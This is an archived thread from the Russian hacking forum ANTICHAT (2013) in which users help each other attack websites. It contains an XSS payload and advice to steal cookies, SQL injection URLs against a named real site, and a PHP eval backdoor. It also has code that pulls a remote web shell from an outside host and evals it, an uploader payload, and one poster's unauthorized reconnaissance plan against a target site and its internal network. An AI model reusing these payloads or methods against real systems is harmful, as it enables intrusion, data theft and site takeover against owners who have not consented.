ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

25.03.2013, 23:27
|
|
Познающий
Регистрация: 11.03.2009
Сообщений: 45
Провел на форуме: 938272
Репутация:
1
|
|
Кто-нибудь может проконсультировать по XSS?
Суть такая, короче зарегистровался на сайте под ником '>alert()
и какую бы страницу я не открыл выскакивает окошко-оповещение, как можно раскрутить?
|
|
|

25.03.2013, 23:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 1448
Репутация:
0
|
|
Сообщение от AIRZI
AIRZI said:
Кто-нибудь может проконсультировать по XSS?
Суть такая, короче зарегистровался на сайте под ником '>alert()
и какую бы страницу я не открыл выскакивает окошко-оповещение, как можно раскрутить?
Можно воровать кукисы, делать редиректы, впихивать вирусы. Да что угодно можно делать, главное - чтобы допустимая длинна логина позволяла вставить желаемый скрипт.
|
|
|
|

25.03.2013, 23:49
|
|
Познающий
Регистрация: 11.03.2009
Сообщений: 45
Провел на форуме: 938272
Репутация:
1
|
|
Сообщение от HackCrack
HackCrack said:
Можно воровать кукисы, делать редиректы, впихивать вирусы. Да что угодно можно делать, главное - чтобы допустимая длинна логина позволяла вставить желаемый скрипт.
Ник можно очень много букв и цифр впихнуть, после того как я впихнул в ник свой код, как своровать кукисы?
Ведь по логике админ должен пройти по какой-то ядовитой ссылке7
|
|
|

26.03.2013, 00:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от HackCrack
HackCrack said:
Спасибо.
Теперь проблема в том, чтобы получить названия таблиц.
Код:
Code:
http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+limit+4,1+--+
Выводит названия таблиц information_schema типа CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS и так далее..
Как получить нужные таблицы?
листать дальшше
Сообщение от AIRZI
AIRZI said:
Ник можно очень много букв и цифр впихнуть, после того как я впихнул в ник свой код, как своровать кукисы?
Ведь по логике админ должен пройти по какой-то ядовитой ссылке7
/thread20140.html
|
|
|
|

26.03.2013, 00:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 18665
Репутация:
27
|
|
Сообщение от HackCrack
HackCrack said:
Спасибо.
Теперь проблема в том, чтобы получить названия таблиц.
Код:
Code:
http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+limit+4,1+--+
Выводит названия таблиц information_schema типа CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS и так далее..
Как получить нужные таблицы?
PS. пробелы в слове information не удаляются в сообщении. В юрл-строке их нету.
Код:
Code:
http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+where+table_schema=database()+limit+4,1+--+
|
|
|
|

26.03.2013, 12:56
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме: 189651
Репутация:
-5
|
|
На сайте есть минишелл eval(stripslashes($_GET[e]));
allow_url_fopen On
allow_url_include Off
disable_functions exec,passthru,shell_exec,proc_open,popen
Как залить полноценный шелл, если в том месте где лежит минишелл нет прав на заливку? т.е сделать аплоадер и залить в данную же папку не прокатит
|
|
|

26.03.2013, 13:24
|
|
Guest
Сообщений: n/a
Провел на форуме: 29647
Репутация:
1
|
|
Сообщение от Evil_Genius
Evil_Genius said:
На сайте есть минишелл eval(stripslashes($_GET[e]));
allow_url_fopen On
allow_url_include Off
disable_functions exec,passthru,shell_exec,proc_open,popen
Как залить полноценный шелл, если в том месте где лежит минишелл нет прав на заливку? т.е сделать аплоадер и залить в данную же папку не прокатит
Если бэкдор не в индексе то просто в него и запиши шелл(предварительно скопируй его содержимое) а там с шелла и смотри по бырому куда залиться.
Код:
Code:
$content=file_get_contents("http://yourshell.txt");$h=fopen("файл с мини шеллом",w);$text=$content;fwrite($h,$text);fclose($h);
UPD
А еще проще залей текст шелла без на хост
,а потом
?yourbackdoor=eval(file_get_contents('http://site.ru/shell.txt')); и получишь полноценный шелл без заливки.
|
|
|
|

26.03.2013, 18:00
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме: 189651
Репутация:
-5
|
|
Сообщение от blesse
blesse said:
Если бэкдор не в индексе то просто в него и запиши шелл(предварительно скопируй его содержимое) а там с шелла и смотри по бырому куда залиться.
Код:
Code:
$content=file_get_contents("http://yourshell.txt");$h=fopen("файл с мини шеллом",w);$text=$content;fwrite($h,$text);fclose($h);
UPD
А еще проще залей текст шелла без на хост
,а потом
?yourbackdoor=eval(file_get_contents('http://site.ru/shell.txt')); и получишь полноценный шелл без заливки.
Такое не прокатывает какраз(((
Вот таким методом выводится через минишелл.
file.php?e=phpinfo();
Картинку, текстовый файл и т.п не закачать никак. Не позволяется никак. Файл править не могу, чтобы php вставить.
Ранее нормально закачивал таким методом, но щас папка закрыта для правки:
file.php?e=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=/form%3E
|
|
|

26.03.2013, 18:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 29647
Репутация:
1
|
|
Сообщение от Evil_Genius
Evil_Genius said:
Такое не прокатывает какраз(((
Вот таким методом выводится через минишелл.
file.php?e=phpinfo();
Картинку, текстовый файл и т.п не закачать никак. Не позволяется никак. Файл править не могу, чтобы php вставить.
Ранее нормально закачивал таким методом, но щас папка закрыта для правки:
file.php?e=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=/form%3E
Ну Дак ты пиши чё не прокатывает????
|
|
|
|

26.03.2013, 18:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
Добрый день. Прошу прощения за глупый вопрос, но что-то никак не могу решить для себя такую проблему:
Хочу получить как можно более широкий доступ к нужному мне сайту, но в этом деле я-новичек. Поэтому сделал следующее:
1. Просканировал сайт акунетиксом (он нашел там читалку файлов, XSS, и поля для брута)
2. Просканировал сайт с помощью Wikto backend, используя структуру, построенную акунетиксом, нашел несколько "спрятанных" файлов, в том числе rsa-ключи для подключения к виртуальной сети
3. Просканировал сайт и виртуальную сеть Нмапом, нашел открытые порты и проассоциировал их с приложениями.
4. В расшаренных папках виртуальной сети ничего интересного не нашел.
5. Читалкой файлов прочитал и сохранил у себя все конфиги и ПХП-шки, какие смог найти.
А теперь уперся в стену: сайт использует пофиксенный TBdev, с моими ущербными знаниями ПХП и мускуля трудно надеяться на нахождение инъекции и ее эксплуатацию, кроме того, насколько я понял, инъекция - это почти крайний случай (когда нет доступа к файлам, порты закрыты и т.д.). В моем-же случае есть открытые порты, могу читать файлы, и имею доступ к внутренней сети, но не знаю, как этим воспользоваться.
Для себя выстроил следующий алгоритм:
1. Атака на открытые порты сайта и устройств сети (инфы и приложений не могу найти, Nmap почему-то не хочет запускать скрипты)
2. Поиск места хранения файлов базы данных и открытие их через читалку файлов (меня уверяют, что таких файлов не существует)
3. Анализ ПХП кода и составление действующих инъекций (не хватает знаний для анализа структуры кода, а программ, автоматизирующих этот процесс, по-видимому, тоже нет)
4. Брут по доступным формам авторизации (кажись, как-то натыкался на проги, поищу, но админ всегда залогинен, как это обойти, не знаю)
5. XSS (но про них даже еще не читал и пока слабо представляю принцип работы)
6. Помещение троянов во внутреннюю сеть (но это для меня вообще фантастика)
Прошу помощи с литературой, методой и софтом, особенно по первым пунктам.
Спасибо
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|